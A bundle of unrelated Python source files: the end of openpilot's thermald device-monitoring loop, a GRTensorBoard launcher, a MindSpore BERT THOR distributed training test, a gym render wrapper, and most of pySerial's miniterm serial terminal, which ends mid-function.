msg.deviceState.batteryCurrent = HARDWARE.get_battery_current()
msg.deviceState.usbOnline = HARDWARE.get_usb_present()
current_filter.update(msg.deviceState.batteryCurrent / 1e6)
max_comp_temp = temp_filter.update(
max(max(msg.deviceState.cpuTempC), msg.deviceState.memoryTempC, max(msg.deviceState.gpuTempC))
)
#if handle_fan is not None:
# fan_speed = handle_fan(controller, max_comp_temp, fan_speed, onroad_conditions["ignition"])
# msg.deviceState.fanSpeedPercentDesired = fan_speed
is_offroad_for_5_min = (started_ts is None) and ((not started_seen) or (off_ts is None) or (sec_since_boot() - off_ts > 60 * 5))
if is_offroad_for_5_min and max_comp_temp > OFFROAD_DANGER_TEMP:
# If device is offroad we want to cool down before going onroad
# since going onroad increases load and can make temps go over 107
thermal_status = ThermalStatus.danger
else:
current_band = THERMAL_BANDS[thermal_status]
band_idx = list(THERMAL_BANDS.keys()).index(thermal_status)
if current_band.min_temp is not None and max_comp_temp < current_band.min_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx - 1]
elif current_band.max_temp is not None and max_comp_temp > current_band.max_temp:
thermal_status = list(THERMAL_BANDS.keys())[band_idx + 1]
# **** starting logic ****
# Ensure date/time are valid
now = datetime.datetime.utcnow()
startup_conditions["time_valid"] = True #(now.year > 2020) or (now.year == 2020 and now.month >= 10)
set_offroad_alert_if_changed("Offroad_InvalidTime", (not startup_conditions["time_valid"]))
startup_conditions["up_to_date"] = True #params.get("Offroad_ConnectivityNeeded") is None or params.get_bool("DisableUpdates") or params.get_bool("SnoozeUpdate")
startup_conditions["not_uninstalling"] = not params.get_bool("DoUninstall")
startup_conditions["accepted_terms"] = params.get("HasAcceptedTerms") == terms_version
# with 2% left, we killall, otherwise the phone will take a long time to boot
startup_conditions["free_space"] = msg.deviceState.freeSpacePercent > 2
startup_conditions["completed_training"] = params.get("CompletedTrainingVersion") == training_version or \
params.get_bool("Passive")
startup_conditions["not_driver_view"] = not params.get_bool("IsDriverViewEnabled")
startup_conditions["not_taking_snapshot"] = not params.get_bool("IsTakingSnapshot")
# if any CPU gets above 107 or the battery gets above 63, kill all processes
# controls will warn with CPU above 95 or battery above 60
onroad_conditions["device_temp_good"] = thermal_status < ThermalStatus.danger
set_offroad_alert_if_changed("Offroad_TemperatureTooHigh", (not onroad_conditions["device_temp_good"]))
if TICI:
missing = (not Path("/data/media").is_mount()) and (not os.path.isfile("/persist/comma/living-in-the-moment"))
set_offroad_alert_if_changed("Offroad_StorageMissing", missing)
# Handle offroad/onroad transition
should_start = all(onroad_conditions.values())
if started_ts is None:
should_start = should_start and all(startup_conditions.values())
if should_start != should_start_prev or (count == 0):
params.put_bool("IsOnroad", should_start)
params.put_bool("IsOffroad", not should_start)
params.put_bool("IsEngaged", False)
engaged_prev = False
HARDWARE.set_power_save(not should_start)
if sm.updated['controlsState']:
engaged = sm['controlsState'].enabled
if engaged != engaged_prev:
params.put_bool("IsEngaged", engaged)
engaged_prev = engaged
try:
with open('/dev/kmsg', 'w') as kmsg:
kmsg.write(f"<3>[thermald] engaged: {engaged}\n")
except Exception:
pass
if should_start:
off_ts = None
if started_ts is None:
started_ts = sec_since_boot()
started_seen = True
else:
if onroad_conditions["ignition"] and (startup_conditions != startup_conditions_prev):
cloudlog.event("Startup blocked", startup_conditions=startup_conditions, onroad_conditions=onroad_conditions)
started_ts = None
if off_ts is None:
off_ts = sec_since_boot()
# Offroad power monitoring
power_monitor.calculate(peripheralState, onroad_conditions["ignition"])
msg.deviceState.offroadPowerUsageUwh = power_monitor.get_power_used()
msg.deviceState.carBatteryCapacityUwh = max(0, power_monitor.get_car_battery_capacity())
current_power_draw = HARDWARE.get_current_power_draw() # pylint: disable=assignment-from-none
msg.deviceState.powerDrawW = current_power_draw if current_power_draw is not None else 0
# Check if we need to disable charging (handled by boardd)
msg.deviceState.chargingDisabled = power_monitor.should_disable_charging(onroad_conditions["ignition"], in_car, off_ts)
# Check if we need to shut down
if power_monitor.should_shutdown(peripheralState, onroad_conditions["ignition"], in_car, off_ts, started_seen):
cloudlog.warning(f"shutting device down, offroad since {off_ts}")
params.put_bool("DoShutdown", True)
msg.deviceState.chargingError = current_filter.x > 0. and msg.deviceState.batteryPercent < 90 # if current is positive, then battery is being discharged
msg.deviceState.started = started_ts is not None
msg.deviceState.startedMonoTime = int(1e9*(started_ts or 0))
last_ping = params.get("LastAthenaPingTime")
if last_ping is not None:
msg.deviceState.lastAthenaPingTime = int(last_ping)
msg.deviceState.thermalStatus = thermal_status
pm.send("deviceState", msg)
if EON and not is_uno:
set_offroad_alert_if_changed("Offroad_ChargeDisabled", (not usb_power))
should_start_prev = should_start
startup_conditions_prev = startup_conditions.copy()
# Log to statsd
statlog.gauge("free_space_percent", msg.deviceState.freeSpacePercent)
statlog.gauge("gpu_usage_percent", msg.deviceState.gpuUsagePercent)
statlog.gauge("memory_usage_percent", msg.deviceState.memoryUsagePercent)
for i, usage in enumerate(msg.deviceState.cpuUsagePercent):
statlog.gauge(f"cpu{i}_usage_percent", usage)
for i, temp in enumerate(msg.deviceState.cpuTempC):
statlog.gauge(f"cpu{i}_temperature", temp)
for i, temp in enumerate(msg.deviceState.gpuTempC):
statlog.gauge(f"gpu{i}_temperature", temp)
statlog.gauge("memory_temperature", msg.deviceState.memoryTempC)
statlog.gauge("ambient_temperature", msg.deviceState.ambientTempC)
for i, temp in enumerate(msg.deviceState.pmicTempC):
statlog.gauge(f"pmic{i}_temperature", temp)
for i, temp in enumerate(last_hw_state.nvme_temps):
statlog.gauge(f"nvme_temperature{i}", temp)
for i, temp in enumerate(last_hw_state.modem_temps):
statlog.gauge(f"modem_temperature{i}", temp)
statlog.gauge("fan_speed_percent_desired", msg.deviceState.fanSpeedPercentDesired)
statlog.gauge("screen_brightness_percent", msg.deviceState.screenBrightnessPercent)
# report to server once every 10 minutes
if (count % int(600. / DT_TRML)) == 0:
if EON and started_ts is None and msg.deviceState.memoryUsagePercent > 40:
cloudlog.event("High offroad memory usage", mem=msg.deviceState.memoryUsagePercent)
cloudlog.event("STATUS_PACKET",
count=count,
pandaStates=[strip_deprecated_keys(p.to_dict()) for p in pandaStates],
peripheralState=strip_deprecated_keys(peripheralState.to_dict()),
location=(strip_deprecated_keys(sm["gpsLocationExternal"].to_dict()) if sm.alive["gpsLocationExternal"] else None),
deviceState=strip_deprecated_keys(msg.to_dict()))
count += 1
def main():
hw_queue = queue.Queue(maxsize=1)
end_event = threading.Event()
threads = [
threading.Thread(target=hw_state_thread, args=(end_event, hw_queue)),
threading.Thread(target=thermald_thread, args=(end_event, hw_queue)),
]
for t in threads:
t.start()
try:
while True:
time.sleep(1)
if not all(t.is_alive() for t in threads):
break
finally:
end_event.set()
for t in threads:
t.join()
if __name__ == "__main__":
main()
|
program.py
|
import argparse
import os
import signal
import sys
import threading
from tensorboard import program
from gr_tensorboard.version import VERSION
from tensorboard.backend.event_processing import event_file_inspector as efi
from tensorboard.plugins import base_plugin
from .application import gr_tensorboard_wsgi
from .logging import _logger
try:
from absl import flags as absl_flags
from absl.flags import argparse_flags
except ImportError:
# Fall back to argparse with no absl flags integration.
absl_flags = None
argparse_flags = argparse
class GRTensorBoard(program.TensorBoard):
def main(self, ignored_argv=('',)):
if self.flags.inspect:
_logger.log_message_info('Not bringing up GRTensorBoard, but inspecting event files.')
event_file = os.path.expanduser(self.flags.event_file)
efi.inspect(self.flags.logdir, event_file, self.flags.tag)
return 0
try:
server = self._make_server()
sys.stderr.write('GRTensorBoard %s at %s (Press CTRL+C to quit)\n' %
(VERSION, server.get_url()))
sys.stderr.flush()
server.serve_forever()
return 0
except program.TensorBoardServerException as e:
_logger.log_message_info("Error: " + e.msg)
sys.stderr.write('ERROR: %s\n' % e.msg)
sys.stderr.flush()
return -1
def launch(self):
"""Python API for launching GRTensorBoard.
This method is the same as main() except it launches TensorBoard in
a separate permanent thread. The configure() method must be called
first.
Returns:
The URL of the GRTensorBoard web server.
:rtype: str
"""
# Make it easy to run TensorBoard inside other programs, e.g. Colab.
server = self._make_server()
thread = threading.Thread(target=server.serve_forever, name='GRTensorBoard')
thread.daemon = True
thread.start()
return server.get_url()
def _register_info(self, server):
self._register_info(server)
def _install_signal_handler(self, signal_number, signal_name):
self._install_signal_handler(signal_number, signal_name)
def _make_server(self):
app = gr_tensorboard_wsgi(self.flags, self.plugin_loaders, self.assets_zip_provider)
return self.server_class(app, self.flags)
|
test_bert_thor.py
|
# Copyright 2020-2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""test bert thor performance with 8p on mlperf dataset"""
import os
import time
from multiprocessing import Process, Queue
import pytest
import numpy as np
import mindspore.dataset as ds
import mindspore.common.dtype as mstype
import mindspore.communication.management as D
from mindspore import context
from mindspore import log as logger
from mindspore.train.callback import Callback
from mindspore.context import ParallelMode
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from mindspore.nn.optim import THOR
from mindspore.train.model import Model
from mindspore.train.train_thor import ConvertModelUtils
import mindspore.dataset.transforms.c_transforms as C
from model_zoo.official.nlp.bert.src.bert_for_pre_training import BertNetworkWithLoss, BertTrainOneStepCell
from model_zoo.official.nlp.bert.src.utils import get_bert_thor_lr, get_bert_thor_damping
from model_zoo.official.nlp.bert.src.bert_model import BertConfig
MINDSPORE_HCCL_CONFIG_PATH = "/home/workspace/mindspore_config/hccl/rank_table_8p.json"
DATASET_PATH = "/home/workspace/mindspore_dataset/bert/thor/en-wiki-512_test_first1wan"
load_checkpoint_path = ""
data_sink_steps = 100
train_steps = 200
batch_size = 12
frequency = 100
momentum = 0.9
weight_decay = 5e-4
loss_scale = 1.0
bert_net_cfg = BertConfig(
seq_length=512,
vocab_size=30522,
hidden_size=1024,
num_hidden_layers=4,
num_attention_heads=16,
intermediate_size=4096,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02,
use_relative_positions=False,
dtype=mstype.float32,
compute_type=mstype.float16
)
np.random.seed(1)
ds.config.set_seed(1)
os.environ['GLOG_v'] = str(2)
class TimeMonitor(Callback):
"""Time Monitor."""
def __init__(self, data_size):
super(TimeMonitor, self).__init__()
self.data_size = data_size
self.epoch_mseconds_list = []
self.per_step_mseconds_list = []
def epoch_begin(self, run_context):
self.epoch_time = time.time()
def epoch_end(self, run_context):
cb_params = run_context.original_args()
epoch_mseconds = (time.time() - self.epoch_time) * 1000
self.epoch_mseconds_list.append(epoch_mseconds)
per_step_mseconds = epoch_mseconds / self.data_size
self.per_step_mseconds_list.append(per_step_mseconds)
print("epoch: {}, per_step_mseconds are {}".format(cb_params.cur_epoch_num, str(per_step_mseconds)), flush=True)
class LossCallback(Callback):
def __init__(self):
super(LossCallback, self).__init__()
self.loss_list = []
def epoch_end(self, run_context):
cb_params = run_context.original_args()
self.loss_list.append(cb_params.net_outputs.asnumpy())
print("epoch: {}, step: {}, outputs are {}".format(cb_params.cur_epoch_num, cb_params.cur_step_num,
str(cb_params.net_outputs)), flush=True)
def create_bert_dataset(device_num=1, rank=0, do_shuffle="true", data_dir=None, schema_dir=None):
"""create train dataset"""
# apply repeat operations
files = os.listdir(data_dir)
data_files = []
for file_name in files:
if "tfrecord" in file_name:
data_files.append(os.path.join(data_dir, file_name))
data_files = sorted(data_files)
data_set = ds.TFRecordDataset(data_files, schema_dir if schema_dir != "" else None,
columns_list=["input_ids", "input_mask", "segment_ids", "next_sentence_labels",
"masked_lm_positions", "masked_lm_ids", "masked_lm_weights"],
shuffle=ds.Shuffle.FILES if do_shuffle == "true" else False,
num_shards=device_num, shard_id=rank, shard_equal_rows=True)
ori_dataset_size = data_set.get_dataset_size()
print('origin dataset size: ', ori_dataset_size)
type_cast_op = C.TypeCast(mstype.int32)
data_set = data_set.map(operations=type_cast_op, input_columns="masked_lm_ids")
data_set = data_set.map(operations=type_cast_op, input_columns="masked_lm_positions")
data_set = data_set.map(operations=type_cast_op, input_columns="next_sentence_labels")
data_set = data_set.map(operations=type_cast_op, input_columns="segment_ids")
data_set = data_set.map(operations=type_cast_op, input_columns="input_mask")
data_set = data_set.map(operations=type_cast_op, input_columns="input_ids")
# apply batch operations
data_set = data_set.batch(batch_size, drop_remainder=True)
logger.info("data size: {}".format(data_set.get_dataset_size()))
logger.info("repeat count: {}".format(data_set.get_repeat_count()))
return data_set
def _set_bert_all_reduce_split():
"""set bert all_reduce fusion split, support num_hidden_layers is 12 and 24."""
context.set_auto_parallel_context(all_reduce_fusion_config=[38, 77])
def train_process_bert_thor(q, device_id, epoch_size, device_num):
os.system("mkdir " + str(device_id))
os.chdir(str(device_id))
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", device_id=device_id, save_graphs=False)
context.set_context(reserve_class_name_in_scope=False)
context.set_context(max_call_depth=3000)
os.environ['MINDSPORE_HCCL_CONFIG_PATH'] = MINDSPORE_HCCL_CONFIG_PATH
os.environ['RANK_ID'] = str(device_id)
os.environ['RANK_SIZE'] = str(device_num)
D.init()
rank = device_id % device_num
context.reset_auto_parallel_context()
_set_bert_all_reduce_split()
context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True,
device_num=device_num)
data_set = create_bert_dataset(device_num=device_num, rank=rank, do_shuffle=False, data_dir=DATASET_PATH,
schema_dir=None)
net_with_loss = BertNetworkWithLoss(bert_net_cfg, True)
new_repeat_count = epoch_size * data_set.get_dataset_size() // data_sink_steps
new_repeat_count = min(new_repeat_count, train_steps // data_sink_steps)
lr = get_bert_thor_lr()
damping = get_bert_thor_damping()
split_indices = [38, 77]
optimizer = THOR(net_with_loss, lr, damping, momentum, weight_decay, loss_scale, batch_size,
decay_filter=lambda x: 'layernorm' not in x.name.lower() and 'bias' not in x.name.lower(),
split_indices=split_indices)
time_monitor_callback = TimeMonitor(data_sink_steps)
loss_callback = LossCallback()
callback = [time_monitor_callback, loss_callback]
if load_checkpoint_path:
param_dict = load_checkpoint(load_checkpoint_path)
load_param_into_net(net_with_loss, param_dict)
net_with_grads = BertTrainOneStepCell(net_with_loss, optimizer=optimizer)
model = Model(net_with_grads)
model = ConvertModelUtils().convert_to_thor_model(model, network=net_with_grads, optimizer=optimizer,
frequency=frequency)
model.train(new_repeat_count, data_set, callbacks=callback, dataset_sink_mode=True, sink_size=data_sink_steps)
loss_list = loss_callback.loss_list
per_step_mseconds = time_monitor_callback.per_step_mseconds_list
q.put({'loss': loss_list, 'cost': per_step_mseconds})
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_single
def test_bert_thor_8p():
"""test bert thor mlperf 8p"""
q = Queue()
device_num = 8
epoch_size = 2
process = []
for i in range(device_num):
device_id = i
process.append(Process(target=train_process_bert_thor, args=(q, device_id, epoch_size, device_num)))
for i in range(device_num):
process[i].start()
print("Waiting for all subprocesses done...")
for i in range(device_num):
process[i].join()
sum_loss_list = []
sum_cost_list = []
for _ in range(train_steps // data_sink_steps):
sum_loss_list.append(0.0)
sum_cost_list.append(0.0)
for _ in range(device_num):
output = q.get()
loss_list = output['loss']
cost_list = output['cost']
sum_loss_list = np.sum([loss_list, sum_loss_list], axis=0)
sum_cost_list = np.sum([cost_list, sum_cost_list], axis=0)
for j in range(train_steps // data_sink_steps):
print("epoch: ", j, "sum_loss: ", sum_loss_list[j], "sum_cost: ", sum_cost_list[j])
mean_loss = sum_loss_list[-1] / device_num
mean_cost = sum_cost_list[-1] / device_num
for i in range(device_num):
os.system("rm -rf " + str(i))
print("End training...")
assert mean_cost < 69
assert mean_loss < 8.125
if __name__ == '__main__':
begin = time.time()
test_bert_thor_8p()
end = time.time()
print("time span is", end - begin, flush=True)
|
render_observation.py
|
import gym
import cv2
import multiprocessing as mp
import os
import numpy as np
def _render(img):
img = cv2.cvtColor(np.asarray(img), cv2.COLOR_BGR2RGB)
cv2.imshow(str(os.getpid()) + "_render", img)
cv2.waitKey(1)
def _async_callback(q: mp.Queue):
while True:
img = q.get()
_render(img)
class RenderObservation(gym.Wrapper):
"""
Renders the observation as an image
"""
def __init__(self, env: gym.Env, asynch=True):
super(RenderObservation, self).__init__(env)
assert isinstance(env.observation_space, gym.spaces.Box)
self.asynch = asynch
self.last_obs = env.observation_space.sample()
if asynch:
self.frame_q = mp.Queue(maxsize=3)
self.render_proc = mp.Process(target=_async_callback, args=(self.frame_q,))
self.render_proc.start()
def reset(self, **kwargs):
obs = super(RenderObservation, self).reset()
self.last_obs = obs
return obs
def step(self, action):
tup = super(RenderObservation, self).step(action)
self.last_obs = tup[0]
return tup
def render(self, mode="human", **kwargs):
if self.asynch:
if not self.frame_q.full():
self.frame_q.put_nowait(self.last_obs)
else:
_render(self.last_obs)
|
miniterm.py
|
#!C:\Python27\pythonw.exe
# Very simple serial terminal
# (C)2002-2011 Chris Liechti <[email protected]>
# Input characters are sent directly (only LF -> CR/LF/CRLF translation is
# done), received characters are displayed as is (or escaped trough pythons
# repr, useful for debug purposes)
import sys, os, serial, threading
try:
from serial.tools.list_ports import comports
except ImportError:
comports = None
EXITCHARCTER = serial.to_bytes([0x1d]) # GS/CTRL+]
MENUCHARACTER = serial.to_bytes([0x14]) # Menu: CTRL+T
DEFAULT_PORT = None
DEFAULT_BAUDRATE = 9600
DEFAULT_RTS = None
DEFAULT_DTR = None
def key_description(character):
"""generate a readable description for a key"""
ascii_code = ord(character)
if ascii_code < 32:
return 'Ctrl+%c' % (ord('@') + ascii_code)
else:
return repr(character)
# help text, starts with blank line! it's a function so that the current values
# for the shortcut keys is used and not the value at program start
def get_help_text():
return """
--- pySerial (%(version)s) - miniterm - help
---
--- %(exit)-8s Exit program
--- %(menu)-8s Menu escape key, followed by:
--- Menu keys:
--- %(itself)-7s Send the menu character itself to remote
--- %(exchar)-7s Send the exit character itself to remote
--- %(info)-7s Show info
--- %(upload)-7s Upload file (prompt will be shown)
--- Toggles:
--- %(rts)-7s RTS %(echo)-7s local echo
--- %(dtr)-7s DTR %(break)-7s BREAK
--- %(lfm)-7s line feed %(repr)-7s Cycle repr mode
---
--- Port settings (%(menu)s followed by the following):
--- p change port
--- 7 8 set data bits
--- n e o s m change parity (None, Even, Odd, Space, Mark)
--- 1 2 3 set stop bits (1, 2, 1.5)
--- b change baud rate
--- x X disable/enable software flow control
--- r R disable/enable hardware flow control
""" % {
'version': getattr(serial, 'VERSION', 'unknown version'),
'exit': key_description(EXITCHARCTER),
'menu': key_description(MENUCHARACTER),
'rts': key_description('\x12'),
'repr': key_description('\x01'),
'dtr': key_description('\x04'),
'lfm': key_description('\x0c'),
'break': key_description('\x02'),
'echo': key_description('\x05'),
'info': key_description('\x09'),
'upload': key_description('\x15'),
'itself': key_description(MENUCHARACTER),
'exchar': key_description(EXITCHARCTER),
}
if sys.version_info >= (3, 0):
def character(b):
return b.decode('latin1')
else:
def character(b):
return b
LF = serial.to_bytes([10])
CR = serial.to_bytes([13])
CRLF = serial.to_bytes([13, 10])
X00 = serial.to_bytes([0])
X0E = serial.to_bytes([0x0e])
# first choose a platform dependant way to read single characters from the console
global console
if os.name == 'nt':
import msvcrt
class Console(object):
def __init__(self):
pass
def setup(self):
pass # Do nothing for 'nt'
def cleanup(self):
pass # Do nothing for 'nt'
def getkey(self):
while True:
z = msvcrt.getch()
if z == X00 or z == X0E: # functions keys, ignore
msvcrt.getch()
else:
if z == CR:
return LF
return z
console = Console()
elif os.name == 'posix':
import termios, sys, os
class Console(object):
def __init__(self):
self.fd = sys.stdin.fileno()
self.old = None
def setup(self):
self.old = termios.tcgetattr(self.fd)
new = termios.tcgetattr(self.fd)
new[3] = new[3] & ~termios.ICANON & ~termios.ECHO & ~termios.ISIG
new[6][termios.VMIN] = 1
new[6][termios.VTIME] = 0
termios.tcsetattr(self.fd, termios.TCSANOW, new)
def getkey(self):
c = os.read(self.fd, 1)
return c
def cleanup(self):
if self.old is not None:
termios.tcsetattr(self.fd, termios.TCSAFLUSH, self.old)
console = Console()
def cleanup_console():
console.cleanup()
sys.exitfunc = cleanup_console # terminal modes have to be restored on exit...
else:
raise NotImplementedError("Sorry no implementation for your platform (%s) available." % sys.platform)
def dump_port_list():
if comports:
sys.stderr.write('\n--- Available ports:\n')
for port, desc, hwid in sorted(comports()):
#~ sys.stderr.write('--- %-20s %s [%s]\n' % (port, desc, hwid))
sys.stderr.write('--- %-20s %s\n' % (port, desc))
CONVERT_CRLF = 2
CONVERT_CR = 1
CONVERT_LF = 0
NEWLINE_CONVERISON_MAP = (LF, CR, CRLF)
LF_MODES = ('LF', 'CR', 'CR/LF')
REPR_MODES = ('raw', 'some control', 'all control', 'hex')
class Miniterm(object):
def __init__(self, port, baudrate, parity, rtscts, xonxoff, echo=False, convert_outgoing=CONVERT_CRLF, repr_mode=0):
try:
self.serial = serial.serial_for_url(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
self.serial = serial.Serial(port, baudrate, parity=parity, rtscts=rtscts, xonxoff=xonxoff, timeout=1)
self.echo = echo
self.repr_mode = repr_mode
self.convert_outgoing = convert_outgoing
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
self.dtr_state = True
self.rts_state = True
self.break_state = False
def _start_reader(self):
"""Start reader thread"""
self._reader_alive = True
# start serial->console thread
self.receiver_thread = threading.Thread(target=self.reader)
self.receiver_thread.setDaemon(True)
self.receiver_thread.start()
def _stop_reader(self):
"""Stop reader thread only, wait for clean exit of thread"""
self._reader_alive = False
self.receiver_thread.join()
def start(self):
self.alive = True
self._start_reader()
# enter console->serial loop
self.transmitter_thread = threading.Thread(target=self.writer)
self.transmitter_thread.setDaemon(True)
self.transmitter_thread.start()
def stop(self):
self.alive = False
def join(self, transmit_only=False):
self.transmitter_thread.join()
if not transmit_only:
self.receiver_thread.join()
def dump_port_settings(self):
sys.stderr.write("\n--- Settings: %s %s,%s,%s,%s\n" % (
self.serial.portstr,
self.serial.baudrate,
self.serial.bytesize,
self.serial.parity,
self.serial.stopbits))
sys.stderr.write('--- RTS: %-8s DTR: %-8s BREAK: %-8s\n' % (
(self.rts_state and 'active' or 'inactive'),
(self.dtr_state and 'active' or 'inactive'),
(self.break_state and 'active' or 'inactive')))
try:
sys.stderr.write('--- CTS: %-8s DSR: %-8s RI: %-8s CD: %-8s\n' % (
(self.serial.getCTS() and 'active' or 'inactive'),
(self.serial.getDSR() and 'active' or 'inactive'),
(self.serial.getRI() and 'active' or 'inactive'),
(self.serial.getCD() and 'active' or 'inactive')))
except serial.SerialException:
# on RFC 2217 ports it can happen to no modem state notification was
# yet received. ignore this error.
pass
sys.stderr.write('--- software flow control: %s\n' % (self.serial.xonxoff and 'active' or 'inactive'))
sys.stderr.write('--- hardware flow control: %s\n' % (self.serial.rtscts and 'active' or 'inactive'))
sys.stderr.write('--- data escaping: %s linefeed: %s\n' % (
REPR_MODES[self.repr_mode],
LF_MODES[self.convert_outgoing]))
def reader(self):
"""loop and copy serial->console"""
try:
while self.alive and self._reader_alive:
data = character(self.serial.read(1))
if self.repr_mode == 0:
# direct output, just have to care about newline setting
if data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(data)
elif self.repr_mode == 1:
# escape non-printable, let pass newlines
if self.convert_outgoing == CONVERT_CRLF and data in '\r\n':
if data == '\n':
sys.stdout.write('\n')
elif data == '\r':
pass
elif data == '\n' and self.convert_outgoing == CONVERT_LF:
sys.stdout.write('\n')
elif data == '\r' and self.convert_outgoing == CONVERT_CR:
sys.stdout.write('\n')
else:
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 2:
# escape all non-printable, including newline
sys.stdout.write(repr(data)[1:-1])
elif self.repr_mode == 3:
# escape everything (hexdump)
for c in data:
sys.stdout.write("%s " % c.encode('hex'))
sys.stdout.flush()
except serial.SerialException, e:
self.alive = False
# would be nice if the console reader could be interruptted at this
# point...
raise
def writer(self):
"""\
Loop and copy console->serial until EXITCHARCTER character is
found. When MENUCHARACTER is found, interpret the next key
locally.
"""
menu_active = False
try:
while self.alive:
try:
b = console.getkey()
except KeyboardInterrupt:
b = serial.to_bytes([3])
c = character(b)
if menu_active:
if c == MENUCHARACTER or c == EXITCHARCTER: # Menu character again/exit char -> send itself
self.serial.write(b) # send character
if self.echo:
sys.stdout.write(c)
elif c == '\x15': # CTRL+U -> upload file
sys.stderr.write('\n--- File to upload: ')
sys.stderr.flush()
console.cleanup()
filename = sys.stdin.readline().rstrip('\r\n')
if filename:
try:
file = open(filename, 'r')
sys.stderr.write('--- Sending file %s ---\n' % filename)
while True:
line = file.readline().rstrip('\r\n')
if not line:
break
self.serial.write(line)
self.serial.write('\r\n')
# Wait for output buffer to drain.
self.serial.flush()
sys.stderr.write('.') # Progress indicator.
sys.stderr.write('\n--- File %s sent ---\n' % filename)
except IOError, e:
sys.stderr.write('--- ERROR opening file %s: %s ---\n' % (filename, e))
console.setup()
elif c in '\x08hH?': # CTRL+H, h, H, ? -> Show help
sys.stderr.write(get_help_text())
elif c == '\x12': # CTRL+R -> Toggle RTS
self.rts_state = not self.rts_state
self.serial.setRTS(self.rts_state)
sys.stderr.write('--- RTS %s ---\n' % (self.rts_state and 'active' or 'inactive'))
elif c == '\x04': # CTRL+D -> Toggle DTR
self.dtr_state = not self.dtr_state
self.serial.setDTR(self.dtr_state)
sys.stderr.write('--- DTR %s ---\n' % (self.dtr_state and 'active' or 'inactive'))
elif c == '\x02': # CTRL+B -> toggle BREAK condition
self.break_state = not self.break_state
self.serial.setBreak(self.break_state)
sys.stderr.write('--- BREAK %s ---\n' % (self.break_state and 'active' or 'inactive'))
elif c == '\x05': # CTRL+E -> toggle local echo
self.echo = not self.echo
sys.stderr.write('--- local echo %s ---\n' % (self.echo and 'active' or 'inactive'))
elif c == '\x09': # CTRL+I -> info
self.dump_port_settings()
elif c == '\x01': # CTRL+A -> cycle escape mode
self.repr_mode += 1
if self.repr_mode > 3:
self.repr_mode = 0
sys.stderr.write('--- escape data: %s ---\n' % (
REPR_MODES[self.repr_mode],
))
elif c == '\x0c': # CTRL+L -> cycle linefeed mode
self.convert_outgoing += 1
if self.convert_outgoing > 2:
self.convert_outgoing = 0
self.newline = NEWLINE_CONVERISON_MAP[self.convert_outgoing]
sys.stderr.write('--- line feed %s ---\n' % (
LF_MODES[self.convert_outgoing],
))
elif c in 'pP': # P -> change port
dump_port_list()
sys.stderr.write('--- Enter port name: ')
sys.stderr.flush()
console.cleanup()
try:
port = sys.stdin.readline().strip()
except KeyboardInterrupt:
port = None
console.setup()
if port and port != self.serial.port:
# reader thread needs to be shut down
self._stop_reader()
# save settings
settings = self.serial.getSettingsDict()
try:
try:
new_serial = serial.serial_for_url(port, do_not_open=True)
except AttributeError:
# happens when the installed pyserial is older than 2.5. use the
# Serial class directly then.
new_serial = serial.Serial()
new_serial.port = port
# restore settings and open
new_serial.applySettingsDict(settings)
new_serial.open()
new_serial.setRTS(self.rts_state)
new_serial.setDTR(self.dtr_state)
new_serial.setBreak(self.break_state)
except Exception, e:
sys.stderr.write('--- ERROR opening new port: %s ---\n' % (e,))
new_serial.close()
else:
self.serial.close()
self.serial = new_serial
sys.stderr.write('--- Port changed to: %s ---\n' % (self.serial.port,))
# and restart the reader thread
self._start_reader()
elif c in 'bB': # B -> change baudrate
sys.stderr.write('\n--- Baudrate: ')
sys.stderr.flush()
console.cleanup()
backup = self.serial.baudrate
try:
self.serial.baudrate = int(sys.stdin.readline().strip())
except ValueError, e:
sys.stderr.write('--- ERROR setting baudrate: %s ---\n' % (e,))
self.serial.baudrate = backup
else:
self.dump_port_settings()
console.setup()
elif c == '8': # 8 -> change to 8 bits
self.serial.bytesize = serial.EIGHTBITS
self.dump_port_settings()
elif c == '7': # 7 -> change to 8 bits
self.serial.bytesize = serial.SEVENBITS
self.dump_port_settings()
elif c in 'eE': # E -> change to even parity
self.serial.parity = serial.PARITY_EVEN
self.dump_port_settings()
elif c in 'oO': # O -> change to odd parity
self.serial.parity = serial.PARITY_ODD
self.dump_port_settings()
elif c in 'mM': # M -> change to mark parity
self.serial.parity = serial.PARITY_MARK
self.dump_port_settings()
elif c in 'sS': # S -> change to space parity
self.serial.parity = serial.PARITY_SPACE
self.dump_port_settings()
elif c in 'nN': # N -> change to no parity
self.serial.parity = serial.PARITY_NONE
self.dump_port_settings()
elif c == '1': # 1 -> change to 1 stop bits
self.serial.stopbits = serial.STOPBITS_ONE
self.dump_port_settings()
elif c == '2': # 2 -> change to 2 stop bits
self.serial.stopbits = serial.STOPBITS_TWO
self.dump_port_settings()
elif c == '3': # 3 -> change to 1.5 stop bits
self.serial.stopbits = serial.STOPBITS_ONE_POINT_FIVE
self.dump_port_settings()
elif c in 'xX': # X -> change software flow control
self.serial.xonxoff = (c == 'X')
self.dump_port_settings()
elif c in 'rR': # R -> change hardware flow control
self.serial.rtscts = (c == 'R')
self.dump_port_settings()
else:
sys.stderr.write('--- unknown menu character %s --\n' % key_description(c))
menu_active = False
elif c == MENUCHARACTER: # next char will be for menu
menu_active = True
elif c == EXITCHARCTER:
self.stop()
break # exit app
elif c == '\n':
self.serial.write(self.newline) # send newline character(s)
if self.echo:
sys.stdout.write(c) # local echo is a real newline in any case
sys.stdout.flush()
else:
self.serial.write(b) # send byte
if self.echo:
